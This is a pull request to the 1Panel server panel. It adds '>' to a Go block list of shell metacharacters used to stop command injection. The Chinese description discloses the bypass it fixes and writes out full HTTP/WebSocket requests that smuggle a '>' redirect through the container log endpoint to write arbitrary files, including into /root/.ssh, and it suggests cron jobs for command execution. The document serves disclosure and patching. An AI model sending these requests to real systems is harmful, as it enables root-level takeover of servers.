### PR TITLE
fix: 解决命令注入waf被绕过的问题

### DIFF
--- a/backend/utils/cmd/cmd.go
+++ b/backend/utils/cmd/cmd.go
@@ -178,7 +178,7 @@ func CheckIllegal(args ...string) bool {
 		if strings.Contains(arg, "&") || strings.Contains(arg, "|") || strings.Contains(arg, ";") ||
 			strings.Contains(arg, "$") || strings.Contains(arg, "'") || strings.Contains(arg, "`") ||
 			strings.Contains(arg, "(") || strings.Contains(arg, ")") || strings.Contains(arg, "\"") ||
-			strings.Contains(arg, "\n") || strings.Contains(arg, "\r") {
+			strings.Contains(arg, "\n") || strings.Contains(arg, "\r") || strings.Contains(arg, ">") {
 			return true
 		}
 	}


### PR DESCRIPTION
项目存在许多命令注入的地方，部分过滤不严导致任意文件写入，最终导致RCE
我们可以通过使用如下镜像配置写入符号`>`来达到任意文件写入
Dockerfile
```
FROM bash:latest

COPY echo.sh /usr/local/bin/echo.sh
RUN chmod +x /usr/local/bin/echo.sh
CMD ["echo.sh"]
```
echo.sh

```
#!/usr/local/bin/bash
echo "Hello, World!"
```
如何构建此镜像，上传至dockerhub，然后1panel拉取镜像构建容器
发送如下数据包，注意更改containerID为我们构造的恶意容器
```
GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Ftmp%2F1&since=all&tail=100&follow=true HTTP/1.1
Host: xxxx:42713
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Upgrade: websocket
Origin: http://xxx:42713
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d
Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==
```
然后就能将任意自定义的文件写入比如写入`ssh key`，一般该应用为root权限跑的
```
GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e87d2717898d120dac23b13b6f1377%3E%2Froot%2F.ssh%2f1&since=all&tail=100&follow=true HTTP/1.1
Host: xxx:42713
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
Upgrade: websocket
Origin: http://xxx:42713
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: psession=88e51389-ddce-468c-a3be-51c5b2cb2d9d
Sec-WebSocket-Key: FdXBKFviqO4+LSEoucITLA==
```
![图片](https://github.com/1Panel-dev/1Panel/assets/95564938/b3bc6846-95e3-43bd-8949-82eabfdbdfbb)
或者写入定时任务完成任意命令执行